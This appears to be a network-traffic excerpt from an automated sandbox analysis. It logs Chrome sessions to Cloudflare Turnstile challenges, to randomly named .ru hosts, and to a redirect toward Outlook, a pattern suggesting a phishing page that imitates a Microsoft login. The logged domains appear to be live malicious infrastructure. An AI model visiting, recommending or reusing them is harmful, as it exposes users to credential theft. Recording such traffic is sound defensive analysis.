                                                                                                        2024-12-18 22:17:04 UTC1369INData Raw: 61 2b 6e 65 70 32 72 77 49 53 39 75 6f 71 43 70 62 4f 69 6a 4d 58 43 6b 6f 71 74 77 74 4c 58 7a 4d 2b 74 32 4d 71 2f 78 4b 33 64 31 37 6a 51 77 4e 62 65 79 73 58 57 35 66 44 51 35 64 4f 30 73 74 50 59 77 66 48 72 7a 4f 54 62 37 37 6f 41 76 50 61 37 37 4e 33 75 2f 51 67 49 2b 41 44 4d 79 67 48 64 33 74 76 38 34 67 77 46 42 51 7a 4b 38 41 7a 57 48 42 59 54 32 42 33 31 43 39 38 67 49 42 6a 31 4b 52 4d 55 44 43 77 70 49 2b 63 5a 43 68 77 71 4e 43 30 6f 38 6a 67 32 4c 2f 54 75 45 69 6a 37 50 45 41 30 45 77 38 76 4a 79 68 49 4f 54 38 45 4e 53 59 33 4d 46 41 4e 52 41 78 51 53 55 51 35 53 42 68 50 46 45 55 32 50 30 42 67 56 56 42 46 56 43 52 59 49 32 68 64 57 45 31 59 4c 47 4d 6f 57 55 70 64 52 48 52 70 5a 46 6c 6b 4f 47 77 33 66 48 46 73 59 57 4a 41 64 7a 78 74
                                                                                                        Data Ascii: a+nep2rwIS9uoqCpbOijMXCkoqtwtLXzM+t2Mq/xK3d17jQwNbeysXW5fDQ5dO0stPYwfHrzOTb77oAvPa77N3u/QgI+ADMygHd3tv84gwFBQzK8AzWHBYT2B31C98gIBj1KRMUDCwpI+cZChwqNC0o8jg2L/TuEij7PEA0Ew8vJyhIOT8ENSY3MFANRAxQSUQ5SBhPFEU2P0BgVVBFVCRYI2hdWE1YLGMoWUpdRHRpZFlkOGw3fHFsYWJAdzxt


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.449783104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:05 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:06 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 18 Dec 2024 22:17:05 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cf-chl-out: MFicOD3N/tv3xUoq+9R5qAC++ihtJJGSOAo=$64FTDPz2qojV3Xf0
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42856388e7420b-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:17:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.449784104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:11 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 33878
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 0
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: 8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:11 UTC16384OUTData Raw: 76 5f 38 66 34 32 38 35 31 32 34 65 37 65 64 65 39 34 3d 48 41 31 55 56 44 6b 42 78 53 41 6b 78 71 42 6b 70 24 35 24 77 71 51 6b 54 24 63 53 55 50 2d 37 55 51 65 6d 44 24 4b 5a 24 71 78 44 61 70 24 33 55 44 73 79 6d 57 24 55 55 39 32 42 55 24 64 31 24 42 4c 7a 6d 34 44 44 76 6b 24 6b 4d 24 52 65 66 25 32 62 31 24 53 31 24 33 47 55 51 48 4a 57 33 59 76 55 24 6a 52 55 71 79 24 33 71 6d 6b 78 64 67 31 4e 7a 24 52 51 55 53 30 7a 24 58 59 64 69 50 24 4a 4f 62 31 6a 78 31 24 24 30 7a 24 61 34 24 78 50 55 6b 61 24 57 65 24 39 55 24 70 42 55 44 70 32 42 71 6f 72 24 6d 73 36 65 4f 47 4c 67 53 76 24 6b 76 6f 36 4e 53 47 41 74 31 4c 24 36 35 64 24 4d 65 78 52 59 6b 6e 24 24 41 73 78 69 76 32 39 55 6b 37 58 6f 30 6f 49 74 32 2d 68 6a 50 24 37 77 74 4b 50 77 64 66 35
                                                                                                        Data Ascii: v_8f4285124e7ede94=HA1UVDkBxSAkxqBkp$5$wqQkT$cSUP-7UQemD$KZ$qxDap$3UDsymW$UU92BU$d1$BLzm4DDvk$kM$Ref%2b1$S1$3GUQHJW3YvU$jRUqy$3qmkxdg1Nz$RQUS0z$XYdiP$JOb1jx1$$0z$a4$xPUka$We$9U$pBUDp2Bqor$ms6eOGLgSv$kvo6NSGAt1L$65d$MexRYkn$$Asxiv29Uk7Xo0oIt2-hjP$7wtKPwdf5
                                                                                                        2024-12-18 22:17:11 UTC16384OUTData Raw: 72 6e 39 54 37 32 70 79 4e 51 71 45 5a 58 44 67 2b 64 32 47 41 4e 51 6d 6b 74 47 4c 31 24 62 51 24 24 6b 67 67 6b 71 31 24 6b 65 74 45 4b 24 6b 68 24 33 50 51 6a 55 4c 55 7a 4a 6b 46 47 69 51 52 7a 53 24 6d 7a 24 4f 64 44 55 6b 65 24 47 24 71 7a 6b 4d 24 35 24 6b 32 6b 42 6a 62 42 70 64 24 52 24 50 55 71 77 7a 4c 24 53 32 6b 66 48 32 55 53 57 44 41 6b 68 30 65 7a 71 51 6b 36 24 4e 7a 24 57 55 2d 24 69 7a 59 50 6b 48 24 4d 55 6b 64 6b 72 24 6a 64 6d 32 6b 58 24 52 32 71 4c 24 59 24 4e 30 34 32 6b 48 73 65 55 51 6a 49 6e 67 51 24 44 79 6b 75 24 48 24 6b 36 6b 34 24 50 32 24 39 6b 34 24 65 55 51 50 24 32 24 53 7a 31 36 6b 4c 31 6a 78 53 52 24 47 24 41 78 24 44 49 71 24 59 24 6b 45 6b 4b 24 5a 4a 44 4e 4b 4c 31 65 7a 57 31 6b 75 24 2b 6c 6b 4c 24 69 24 36 24
                                                                                                        Data Ascii: rn9T72pyNQqEZXDg+d2GANQmktGL1$bQ$$kggkq1$ketEK$kh$3PQjULUzJkFGiQRzS$mz$OdDUke$G$qzkM$5$k2kBjbBpd$R$PUqwzL$S2kfH2USWDAkh0ezqQk6$Nz$WU-$izYPkH$MUkdkr$jdm2kX$R2qL$Y$N042kHseUQjIngQ$Dyku$H$k6k4$P2$9k4$eUQP$2$Sz16kL1jxSR$G$Ax$DIq$Y$kEkK$ZJDNKL1ezW1ku$+lkL$i$6$
                                                                                                        2024-12-18 22:17:11 UTC1110OUTData Raw: 53 68 24 58 6c 73 66 55 44 30 56 2b 55 59 65 31 39 6b 50 7a 6e 6f 66 63 6f 58 6d 79 46 53 44 43 44 7a 52 44 42 36 6d 64 76 73 4a 75 70 49 32 43 71 39 36 43 58 43 4f 65 79 64 4a 24 57 32 32 48 62 4c 68 4d 24 4e 45 35 5a 78 57 37 64 31 71 45 4a 64 55 61 52 57 7a 63 66 24 33 53 65 52 33 68 54 74 57 71 6f 39 75 55 6e 64 24 6f 24 37 7a 4e 4a 51 57 52 68 53 45 79 24 72 57 4c 79 66 6b 49 24 57 53 66 58 6f 71 6d 6f 50 24 61 66 24 52 6e 53 32 4c 66 5a 35 52 79 55 39 24 48 4a 24 51 4f 65 42 4f 74 4d 36 24 59 54 58 72 4a 24 45 67 54 6e 6d 4a 7a 45 36 4d 32 56 4a 78 45 53 4d 30 56 55 6b 4a 6f 32 51 4e 53 70 24 67 61 41 68 6a 50 6c 34 32 59 44 6d 4b 24 37 55 46 52 24 51 7a 5a 7a 31 56 33 4f 78 51 4b 49 30 35 6d 7a 4a 31 76 2b 33 43 79 61 4b 31 46 6f 2d 67 51 74 30 46
                                                                                                        Data Ascii: Sh$XlsfUD0V+UYe19kPznofcoXmyFSDCDzRDB6mdvsJupI2Cq96CXCOeydJ$W22HbLhM$NE5ZxW7d1qEJdUaRWzcf$3SeR3hTtWqo9uUnd$o$7zNJQWRhSEy$rWLyfkI$WSfXoqmoP$af$RnS2LfZ5RyU9$HJ$QOeBOtM6$YTXrJ$EgTnmJzE6M2VJxESM0VUkJo2QNSp$gaAhjPl42YDmK$7UFR$QzZz1V3OxQKI05mzJ1v+3CyaK1Fo-gQt0F
                                                                                                        2024-12-18 22:17:11 UTC286INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:17:11 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 4544
                                                                                                        Connection: close
                                                                                                        cf-chl-out: W5z9dNxAeDWO/L4BWApH8mKURPs7WGxbXZIn63sufK3DoWFzsvdSqDKx/5I8XJDuhV47bFLpCGOXeTjMShzk+3N8uqj1vUhCGd+EAVp9/7/zRQYh1UQfk9w=$WbBRUE/ov/hcAVHx
                                                                                                        2024-12-18 22:17:11 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 62 64 4a 54 53 4b 73 67 6f 58 43 6c 65 69 48 4b 47 68 63 45 6e 6c 49 48 63 6d 36 77 62 66 6f 44 52 72 6c 67 4a 68 67 4e 30 43 67 75 41 42 43 70 2f 66 34 39 50 2b 73 43 45 54 75 43 46 46 33 6d 58 54 65 62 71 38 70 6a 73 72 64 63 38 77 75 50 78 77 30 47 38 4b 6a 30 55 51 36 57 50 62 7a 38 78 59 62 69 6e 39 61 61 53 53 6f 68 61 71 6c 55 64 41 79 49 43 52 34 30 57 2f 75 6f 74 37 4f 54 75 73 72 68 32 32 32 2f 41 41 6b 56 54 4d 6f 69 78 64 68 73 51 6e 42 49 47 71 2f 43 62 32 70 64 64 67 54 79 2f 74 50 64 5a 71 45 74 53 44 48 38 51 32 77 39 69 59 39 57 76 79 55 6c 43 49 4a 32 62 73 58 6a 41 55 58 51 32 70 6b 2f 39 67 70 52 37 31 74 36 75 42 57 4a 52 64 36 62 44 79 41 39 7a 54 6a 54 2b 54 38 39 53 36 32 75 7a 74 34 68 46
                                                                                                        Data Ascii: cf-chl-out-s: bdJTSKsgoXCleiHKGhcEnlIHcm6wbfoDRrlgJhgN0CguABCp/f49P+sCETuCFF3mXTebq8pjsrdc8wuPxw0G8Kj0UQ6WPbz8xYbin9aaSSohaqlUdAyICR40W/uot7OTusrh222/AAkVTMoixdhsQnBIGq/Cb2pddgTy/tPdZqEtSDH8Q2w9iY9WvyUlCIJ2bsXjAUXQ2pk/9gpR71t6uBWJRd6bDyA9zTjT+T89S62uzt4hF
                                                                                                        2024-12-18 22:17:11 UTC1193INData Raw: 54 58 35 6f 62 33 4f 46 62 5a 4a 70 6d 47 57 55 63 47 5a 76 64 6e 32 4d 58 6c 36 62 6e 61 47 69 6e 6d 5a 69 70 6f 4f 6a 69 5a 2b 51 5a 37 43 4e 6a 49 65 43 70 70 46 30 71 36 6d 5a 69 72 79 37 6e 59 37 41 73 61 53 68 74 4c 79 7a 70 34 48 47 75 35 6d 73 7a 4d 71 69 6a 73 48 4b 70 71 66 56 79 4e 43 6e 79 71 58 48 30 4e 75 32 75 73 2f 55 74 74 54 50 34 75 62 58 78 39 71 64 77 75 37 75 72 36 4c 69 34 71 37 75 30 64 66 74 39 66 72 32 73 65 65 33 37 72 76 38 76 2f 69 35 41 72 38 44 30 73 6a 6d 42 75 44 6d 44 4d 6e 6a 36 41 67 44 36 64 38 45 43 2b 6a 69 36 51 73 4b 2b 52 4d 63 47 52 72 54 48 78 76 69 33 2f 73 48 49 51 4c 68 41 41 6f 75 48 51 4c 70 2b 69 51 63 41 76 45 71 4e 42 6f 50 4e 41 73 38 50 44 55 7a 2b 78 6b 77 51 6a 46 44 52 45 63 2f 52 6b 73 32 4c 51 30
                                                                                                        Data Ascii: TX5ob3OFbZJpmGWUcGZvdn2MXl6bnaGinmZipoOjiZ+QZ7CNjIeCppF0q6mZiry7nY7AsaShtLyzp4HGu5mszMqijsHKpqfVyNCnyqXH0Nu2us/UttTP4ubXx9qdwu7ur6Li4q7u0dft9fr2see37rv8v/i5Ar8D0sjmBuDmDMnj6AgD6d8EC+ji6QsK+RMcGRrTHxvi3/sHIQLhAAouHQLp+iQcAvEqNBoPNAs8PDUz+xkwQjFDREc/Rks2LQ0
                                                                                                        2024-12-18 22:17:11 UTC1369INData Raw: 74 6b 51 30 41 58 56 43 67 77 52 36 51 2f 35 42 51 6b 54 32 42 77 64 47 67 51 5a 39 79 41 65 4a 51 41 65 2f 75 51 69 4b 53 6b 6c 36 53 7a 76 43 78 34 70 43 6a 6b 33 4d 50 59 74 44 6a 55 54 4f 53 77 7a 46 79 4a 45 4d 54 46 4a 53 54 73 64 4f 52 73 33 4c 6b 30 4e 53 7a 55 76 45 55 41 70 45 6b 52 4d 47 46 30 32 57 56 6c 4e 4e 55 30 30 54 53 4a 66 4f 43 56 6c 5a 45 30 6d 53 32 68 43 4b 6b 74 69 56 54 39 4a 57 47 78 35 63 33 67 35 65 54 5a 35 59 44 6f 2b 65 33 70 43 51 48 70 47 4f 34 43 49 52 33 31 6e 68 33 70 62 53 48 31 79 63 6f 32 46 56 6c 6d 55 6b 31 65 64 6e 49 6c 77 58 6d 4b 65 6e 46 65 61 6d 6f 5a 68 70 4b 69 4b 6a 71 65 72 61 32 36 6d 72 34 57 44 6c 62 4b 78 70 5a 69 74 6a 48 61 2f 75 4a 4e 36 75 4c 53 43 74 58 2b 35 68 70 4f 33 76 5a 71 47 69 63 43 4c
                                                                                                        Data Ascii: tkQ0AXVCgwR6Q/5BQkT2BwdGgQZ9yAeJQAe/uQiKSkl6SzvCx4pCjk3MPYtDjUTOSwzFyJEMTFJSTsdORs3Lk0NSzUvEUApEkRMGF02WVlNNU00TSJfOCVlZE0mS2hCKktiVT9JWGx5c3g5eTZ5YDo+e3pCQHpGO4CIR31nh3pbSH1yco2FVlmUk1ednIlwXmKenFeamoZhpKiKjqera26mr4WDlbKxpZitjHa/uJN6uLSCtX+5hpO3vZqGicCL
                                                                                                        2024-12-18 22:17:11 UTC1369INData Raw: 67 46 2b 68 63 54 32 4f 6f 4f 31 68 63 5a 32 74 6f 50 47 64 6a 37 4b 52 4d 4d 49 4f 4d 49 2b 69 6a 36 4c 43 6b 79 4b 50 49 6f 47 66 51 73 2b 67 30 4e 47 78 4c 36 44 44 63 57 2b 79 38 57 52 54 77 7a 53 79 49 39 44 45 45 6b 51 54 38 45 4a 79 34 74 44 67 30 7a 4c 52 63 76 4e 78 67 51 4e 44 77 70 48 44 68 50 55 44 64 53 51 6d 4e 49 49 30 5a 70 4c 43 68 49 4b 43 31 55 51 6c 4d 74 59 6b 77 72 51 32 78 4e 52 32 39 79 55 48 30 36 63 7a 39 31 55 33 5a 45 65 59 4e 37 59 6e 74 4d 56 34 4a 6e 53 34 65 4d 68 6c 57 4f 6b 35 4f 46 6b 33 4e 6f 6b 46 71 64 57 35 46 67 6f 5a 71 65 63 6e 70 7a 6f 32 47 6b 68 6d 71 73 61 4a 2b 47 71 47 2b 43 71 70 69 72 74 49 32 54 73 4c 57 4b 70 33 6d 34 66 37 68 37 67 63 47 77 6c 34 57 37 70 70 76 45 78 61 2b 63 72 71 54 47 6a 59 32 2b 75
                                                                                                        Data Ascii: gF+hcT2OoO1hcZ2toPGdj7KRMMIOMI+ij6LCkyKPIoGfQs+g0NGxL6DDcW+y8WRTwzSyI9DEEkQT8EJy4tDg0zLRcvNxgQNDwpHDhPUDdSQmNII0ZpLChIKC1UQlMtYkwrQ2xNR29yUH06cz91U3ZEeYN7YntMV4JnS4eMhlWOk5OFk3NokFqdW5FgoZqecnpzo2GkhmqsaJ+GqG+CqpirtI2TsLWKp3m4f7h7gcGwl4W7ppvExa+crqTGjY2+u
                                                                                                        2024-12-18 22:17:11 UTC613INData Raw: 34 46 52 44 62 42 50 49 67 38 67 51 47 42 68 55 4c 35 41 34 45 42 2b 67 44 49 42 34 54 42 76 4d 50 46 6a 67 46 4b 67 67 61 4f 53 73 32 47 76 6b 6a 49 54 51 44 49 69 56 46 4d 69 51 46 4a 6b 41 74 48 68 73 78 52 7a 4e 51 52 44 49 6b 53 55 59 35 4f 44 34 6f 4f 46 49 75 48 6a 74 42 59 44 49 2f 52 6d 67 32 56 6b 67 6c 57 32 4e 6c 62 44 39 65 4b 32 42 78 57 47 31 57 4e 32 4e 76 66 45 6c 73 58 33 78 39 62 7a 74 65 66 48 74 6d 55 6e 5a 32 53 49 52 4e 66 49 4a 6e 63 6f 42 79 58 70 4a 34 55 57 4b 52 66 49 35 72 66 33 35 75 6a 49 79 42 6d 36 43 68 6d 6d 47 63 6c 36 43 49 65 71 53 4b 66 36 43 72 6f 59 43 31 6f 35 53 56 75 59 4f 76 6e 62 43 30 6e 48 71 34 6a 61 46 2b 6c 71 57 6c 67 72 78 38 72 4a 6a 4d 79 71 6d 4b 79 5a 71 7a 69 37 62 53 78 61 69 6d 72 64 43 74 32 63
                                                                                                        Data Ascii: 4FRDbBPIg8gQGBhUL5A4EB+gDIB4TBvMPFjgFKggaOSs2GvkjITQDIiVFMiQFJkAtHhsxRzNQRDIkSUY5OD4oOFIuHjtBYDI/Rmg2VkglW2NlbD9eK2BxWG1WN2NvfElsX3x9bztefHtmUnZ2SIRNfIJncoByXpJ4UWKRfI5rf35ujIyBm6ChmmGcl6CIeqSKf6CroYC1o5SVuYOvnbC0nHq4jaF+lqWlgrx8rJjMyqmKyZqzi7bSxaimrdCt2c


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.449785104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:13 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:13 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 18 Dec 2024 22:17:13 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cf-chl-out: 9Cx5wpv4zJNgIgyIjLpOTerNmnFE5hUKvE0=$7HQfbm2bXO+1gzpH
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4285932857424d-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:17:13 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.449787104.21.18.1324432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:14 UTC683OUTGET /memxymqebyrphctIBZHJHNAERMLGRRBXYGBJYSLXWCZFEWUYNPCWIYKNBXJXVZDLWGCXYJHQHADKEVP HTTP/1.1
                                                                                                        Host: yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://d7m.kczcylvjubu.ru
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:15 UTC892INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:17:15 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5Gz%2FZk518kMCKjWi8O1384S6CaqYc5QDvs6gR6DnWAVsPrbGFadVREtLuM9cJO49GbCxAsbzEQ%2BteX6K%2B4QBdv8ouxadKsoAz62WbV1ZyD9INBFr3jiyE6B2cPFlYartnxhO8CyUO%2FQV9RlSvgFyLcaJiFmXlVEZctHFDpSrOvBmpUPIRHPfz2aMHCVql6awonbst3H1fG4"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42859e5bfa72b7-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2036&rtt_var=767&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1261&delivery_rate=1423695&cwnd=192&unsent_bytes=0&cid=24c953463fe57a54&ts=883&x=0"
                                                                                                        2024-12-18 22:17:15 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2024-12-18 22:17:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.44979040.99.70.2264432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:18 UTC682OUTGET / HTTP/1.1
                                                                                                        Host: www.outlook.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:18 UTC629INHTTP/1.1 301 Moved Permanently
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Location: https://outlook.live.com/
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        request-id: 1e7b374a-3732-6c9e-4a96-9f2729797b61
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        X-FEServer: DX0P273CA0080
                                                                                                        X-RequestId: 78bccbb4-6e0d-485f-ace1-f3a1c7368557
                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                        X-FEProxyInfo: DX0P273CA0080.AREP273.PROD.OUTLOOK.COM
                                                                                                        X-FEEFZInfo: DXB
                                                                                                        MS-CV: Sjd7HjI3nmxKlp8nKXl7YQ.0
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        X-FEServer: DX0P273CA0080
                                                                                                        Date: Wed, 18 Dec 2024 22:17:29 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.449791104.21.18.1324432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:18 UTC473OUTGET /memxymqebyrphctIBZHJHNAERMLGRRBXYGBJYSLXWCZFEWUYNPCWIYKNBXJXVZDLWGCXYJHQHADKEVP HTTP/1.1
                                                                                                        Host: yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:19 UTC900INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:17:19 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5MtC1oKSm%2BUUH6JUs1kaRdrlIwEvKN0M6syD2JM6xKLm15q8Zx0no%2BYxVTQtOJ6cK8KnDINR26Z2OTTNu6rxM152BBAskr2pQvCkoAw%2B4%2BsNuARWdcmkz0%2BjZBg95AAfjD4%2BhCVqdCFh%2BxQCP8ZvStMDh8CFbLVl0K6fNjhcENvHyQ1uMDEHN2Bg2IZCIUROv3hWyK5D%2FMB"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4285b43d79de95-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1460&rtt_var=1228&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1051&delivery_rate=697896&cwnd=240&unsent_bytes=0&cid=7934bba0121db3d5&ts=906&x=0"
